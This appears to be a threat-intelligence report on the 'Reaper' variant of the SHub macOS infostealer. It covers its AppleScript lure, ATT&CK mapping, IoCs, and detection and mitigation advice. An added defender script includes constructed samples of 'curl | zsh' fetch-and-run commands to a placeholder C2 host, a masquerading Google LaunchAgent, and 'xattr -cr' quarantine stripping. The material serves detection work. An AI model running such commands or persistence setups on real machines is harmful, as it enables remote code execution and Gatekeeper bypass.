Full Report
A new variant of the 'SHub' macOS infostealer uses AppleScript to show a fake security update message and installs a backdoor. [...]
Analysis Summary
This summary provides a technical breakdown of the SHub macOS infostealer variant, known as "Reaper," based on the provided intelligence.
# Tool/Technique: SHub (Variant: Reaper)
## Overview
Reaper is a sophisticated macOS infostealer and backdoor that evolved from the "SHub" malware family. It employs a novel infection chain using the `applescript://` URL scheme to bypass recent macOS security mitigations (specifically Tahoe 26.4 Terminal protections). Its primary purpose is the exfiltration of browser data, cryptocurrency wallets, and sensitive documents, while maintaining persistence to act as a remote access backdoor.
## Technical Details
- **Type**: Malware family (Infostealer / Backdoor)
- **Platform**: macOS
- **Capabilities**: Credential theft, cryptocurrency hijacking, file exfiltration, environment fingerprinting, and remote command execution.
- **First Seen**: May 2026 (Reported)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566.002 - Phishing: Spearphishing Link (Fake app installers/Miro/WeChat lures)
- **TA0002 - Execution**
  - T1059.002 - Command and Scripting Interpreter: AppleScript
  - T1204.001 - User Execution: Malicious Link
- **TA0003 - Persistence**
  - T1543.001 - Create or Modify System Process: Launch Agent
- **TA0005 - Defense Evasion**
  - T1140 - Deobfuscate/Decode Files or Information (ASCII art obfuscation)
  - T1518.001 - Software Discovery: Security Software Discovery (VM/VPN detection)
  - T1553.001 - Subvert Trust Controls: Gatekeeper Bypass (`xattr -cr`)
  - T1614.001 - System Location Discovery: System Language Discovery (CIS/Russian keyboard check)
- **TA0006 - Credential Access**
  - T1555 - Credentials from Password Stores
- **TA0009 - Collection**
  - T1005 - Data from Local System (Filegrabber module)
- **TA0011 - Command and Control**
  - T1102.002 - Web Service: Bidirectional Communication (Telegram bot API)
## Functionality
### Core Capabilities
- **Browser Data Theft**: Targets Chrome, Firefox, Brave, Microsoft Edge, Opera, Vivaldi, Arc, and Orion.
- **Crypto Hijacking**: Steals data from MetaMask, Phantom, Exodus, Atomic Wallet, Ledger Live, Electrum, and Trezor Suite.
- **Credential Harvesting**: Prompts for the macOS user password via fake UI to decrypt Keychains and access protected data.
- **File Exfiltration**: A "Filegrabber" module scans Desktop and Documents for sensitive files (PDF, docx, etc.) under specific size limits (2MB-6MB).
### Advanced Features
- **URL Scheme Exploitation**: Uses `applescript://` to launch the native Script Editor, bypassing Terminal-based "ClickFix" protections.
- **Wallet Injection**: Terminates legitimate wallet applications and replaces their core logic (`app.asar`) with a malicious version.
- **Anti-Analysis/Geofencing**: Fingerprints devices for VMs/VPNs and exits immediately if a Russian/CIS keyboard layout is detected.
- **Persistence & Backdoor**: Installs a LaunchAgent masquerading as a Google update service that beacons every minute and can execute remote payloads.
## Indicators of Compromise
- **File Names**:
  - `app.asar` (Malicious wallet replacement)
  - Google software update masquerade files in LaunchAgents.
- **Network Indicators**:
  - qq-0732gwh22[.]com
  - mlcrosoft[.]co[.]com
  - mlroweb[.]com
  - Telegram API (used for C2/telemetry).
- **Behavioral Indicators**:
  - Execution of `osascript` following a Script Editor launch.
  - Usage of `xattr -cr` on application bundles.
  - Sudden termination and modification of cryptocurrency wallet processes.
  - Unauthorized requests for system passwords via AppleScript dialogs.
## Associated Threat Actors
- **SHub Operators**: An evolving group focusing on macOS targets, shifting from Terminal-based "ClickFix" attacks to AppleScript-based lures.
## Detection Methods
- **Signature-based**: Detection of the malicious `app.asar` hash and specialized AppleScript strings hidden in ASCII art.
- **Behavioral**:
  - Monitoring for `osascript` or `curl | zsh` patterns initiated by the Script Editor.
  - Alerting on the creation of new LaunchAgents in the `com.google...` namespace that do not originate from legitimate Google installers.
  - Monitoring the `applescript://` URL scheme activity.
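The following script is an added example, not code from the report or from any vendor, that turns the behavioral indicators and network IoCs above into runnable defender checks: it flags interpreter processes spawned by Script Editor or `curl | zsh` command lines, `xattr` invocations that clear extended attributes, LaunchAgent plists with a `com.google` label that do not point into the legitimate Google updater directory or that run a shell, and DNS log lines that resolve the listed defanged domains. The process events, plists and DNS lines are constructed samples; the updater directory path and the masquerade label `com.google.softwareupdate.agent` are assumptions, not values from the report.

```python
# Added example (not part of the report): defender-side checks for the
# behavioural indicators and network IoCs described above. All sample
# events, plists and DNS lines below are constructed.
import plistlib
import re

# Parent/child pairs the report calls out: a shell or osascript spawned by Script Editor.
SUSPICIOUS_PARENTS = {"Script Editor"}
SHELL_OR_OSASCRIPT = {"osascript", "zsh", "bash", "sh", "curl"}
PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:zsh|bash|sh)\b")
# xattr with a clear flag (-c, -cr, -rc) strips the quarantine attribute Gatekeeper relies on.
XATTR_CLEAR = re.compile(r"\bxattr\s+-[a-zA-Z]*c[a-zA-Z]*\b")
# Assumption: legitimate Google updater binaries live under this directory.
GOOGLE_UPDATE_DIR = "/Library/Google/GoogleSoftwareUpdate/"
# Defanged network indicators copied from the report's IoC list.
DEFANGED_DOMAINS = ["qq-0732gwh22[.]com", "mlcrosoft[.]co[.]com", "mlroweb[.]com"]


def flag_process_event(event: dict) -> list[str]:
    """Return the indicator names matched by one process-creation event."""
    hits = []
    parent, proc, argv = event["parent"], event["proc"], event["argv"]
    if parent in SUSPICIOUS_PARENTS and proc in SHELL_OR_OSASCRIPT:
        hits.append("script-editor-spawned-interpreter")
    if PIPE_TO_SHELL.search(argv):
        hits.append("curl-piped-to-shell")
    if proc == "xattr" and XATTR_CLEAR.search(argv):
        hits.append("xattr-quarantine-strip")
    return hits


def audit_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return reasons a LaunchAgent plist matches the fake Google updater persistence."""
    data = plistlib.loads(plist_bytes)
    label = str(data.get("Label", ""))
    args = list(data.get("ProgramArguments") or [])
    if not args and "Program" in data:
        args = [data["Program"]]
    cmd = " ".join(args)
    reasons = []
    if not label.startswith("com.google"):
        return reasons  # only the Google-namespace masquerade is in scope here
    if not any(GOOGLE_UPDATE_DIR in a for a in args):
        reasons.append("google-label-outside-updater-dir")
    if re.search(r"(^|/)(?:zsh|bash|sh|osascript)\b", cmd) or PIPE_TO_SHELL.search(cmd):
        reasons.append("google-label-runs-interpreter")
    interval = data.get("StartInterval")
    # The report describes a beacon every minute; a short StartInterval corroborates the other reasons.
    if reasons and isinstance(interval, int) and 0 < interval <= 60:
        reasons.append("beacon-interval-60s-or-less")
    return reasons


def refang(domain: str) -> str:
    """Turn a defanged indicator such as 'evil[.]com' back into a matchable hostname."""
    return domain.replace("[.]", ".").lower()


def match_dns_log(lines: list[str]) -> list[str]:
    """Return the log lines whose queried name is, or is a subdomain of, a listed IoC domain."""
    bad = [refang(d) for d in DEFANGED_DOMAINS]
    hits = []
    for line in lines:
        m = re.search(r"\bquery:\s*(\S+)", line)  # constructed log shape: '... query: host.example'
        if not m:
            continue
        name = m.group(1).rstrip(".").lower()
        if any(name == b or name.endswith("." + b) for b in bad):
            hits.append(line)
    return hits


# --- constructed sample data ---
SAMPLE_EVENTS = [
    {"parent": "Script Editor", "proc": "osascript", "argv": "osascript -e 'do shell script \"...\"'"},
    {"parent": "Script Editor", "proc": "zsh", "argv": "zsh -c 'curl -fsSL https://c2.invalid/p | zsh'"},
    {"parent": "Terminal", "proc": "osascript", "argv": "osascript /Users/me/backup.scpt"},
    {"parent": "zsh", "proc": "xattr", "argv": "xattr -cr /Applications/Fake.app"},
]
FAKE_AGENT = plistlib.dumps({
    "Label": "com.google.softwareupdate.agent",  # constructed masquerade label
    "ProgramArguments": ["/bin/zsh", "-c", "curl -fsSL https://c2.invalid/beacon | zsh"],
    "RunAtLoad": True,
    "StartInterval": 60,
})
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["/Users/me" + GOOGLE_UPDATE_DIR + "GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent"],
    "RunAtLoad": True,
    "StartInterval": 3600,
})
SAMPLE_DNS = [
    "10:00:01 client 10.0.0.5 query: api.mlroweb.com A",
    "10:00:02 client 10.0.0.5 query: www.apple.com A",
    "10:00:03 client 10.0.0.7 query: qq-0732gwh22.com A",
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["proc"], "<-", ev["parent"], flag_process_event(ev))
    print("fake agent:", audit_launch_agent(FAKE_AGENT))
    print("benign agent:", audit_launch_agent(BENIGN_AGENT))
    print("dns hits:", match_dns_log(SAMPLE_DNS))
```

The LaunchAgent check deliberately returns nothing for labels outside `com.google`, mirroring the alerting rule above; widen `label.startswith` if your fleet sees other vendor namespaces being impersonated, and replace the constructed log regex in `match_dns_log` with the field layout of your own resolver logs.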
## Mitigation Strategies
- **User Education**: Training users to recognize that official Apple security updates are never delivered via the macOS Script Editor or "Run" prompts in a browser.
- **Endpoint Hardening**: Use MDM profiles to restrict the usage of sensitive URL schemes or monitor the execution of `osascript`.
- **Access Control**: Implement strict "least privilege" models; monitor for unexpected `xattr` attribute removals which indicate Gatekeeper bypass attempts.
## Related Tools/Techniques
- **ClickFix**: The precursor technique involving social engineering users into pasting code into the Terminal.
- **XProtectRemediator**: The legitimate macOS security tool whose notifications the malware spoofs to exploit user trust.